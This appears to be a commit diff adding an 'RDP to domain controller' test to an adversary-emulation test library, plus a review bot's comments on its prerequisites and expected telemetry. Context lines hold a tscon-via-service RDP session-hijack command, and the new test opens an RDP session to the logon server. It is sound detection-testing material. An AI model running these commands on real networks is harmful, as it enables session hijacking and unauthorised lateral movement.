T1076 rdp to domain controller (#572)
* Added MacOS and Linux isElevated check [todo: test MacOS] * Update Invoke-AtomicTest.ps1 * Update Invoke-AtomicTest.ps1 * Update Invoke-AtomicTest.ps1 * T1076 RDP To Domain Controller
@@ -19,3 +19,30 @@ atomic_tests:
|
||||
sc.exe create sesshijack binpath= "cmd.exe /k tscon 1337 /dest:rdp-tcp#55"
|
||||
net start sesshijack
|
||||
sc.exe delete sesshijack
|
||||
|
||||
- name: RDPto-DomainController
|
||||
description: |
|
||||
Attempt an RDP session via "Connect-RDP" to a system. Default RDPs to (%logonserver%) as the current user
|
||||
|
||||
supported_platforms:
|
||||
- windows
|
||||
|
||||
input_arguments:
|
||||
|
||||
logonserver:
|
||||
description: ComputerName argument default %logonserver%
|
||||
type: String
|
||||
default: $ENV:logonserver.TrimStart("\")
|
||||
|
||||
username:
|
||||
description: Username argument default %USERDOMAIN%\%username%
|
||||
type: String
|
||||
default: $Env:USERDOMAIN\$ENV:USERNAME
|
||||
|
||||
executor:
|
||||
name: powershell
|
||||
elevation_required: false
|
||||
prereq_command: |
|
||||
if((Get-WmiObject -Class Win32_ComputerSystem).PartOfDomain) {0} else {1}
|
||||
command: |
|
||||
Connect-RDP -ComputerName #{logonserver} -User #{username}
|
||||
|
||||
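Review bot: The `prereq_command` of the new RDPto-DomainController test checks only domain membership and never confirms that `Connect-RDP` is available; nothing in the hunk defines or imports that function, and it does not appear to be a stock Windows cmdlet, so a check such as `Get-Command Connect-RDP -ErrorAction SilentlyContinue` belongs in the prerequisite. The `{0} else {1}` branches also only write a number to the pipeline, so whether a non-domain host is actually skipped depends on how Invoke-AtomicTest reads the result, which should be confirmed against the runner. The test opens an interactive session on a domain controller with no cleanup step, so the description should say that the session is left open and name the telemetry a defender should expect, e.g. `Expected telemetry: logon type 10 (RemoteInteractive) on the target host.` The PowerShell defaults would be safer as single-quoted YAML scalars, e.g. `default: '$ENV:logonserver.TrimStart("\")'`. Indentation is not visible in this rendering, so the nesting of the new keys could not be checked.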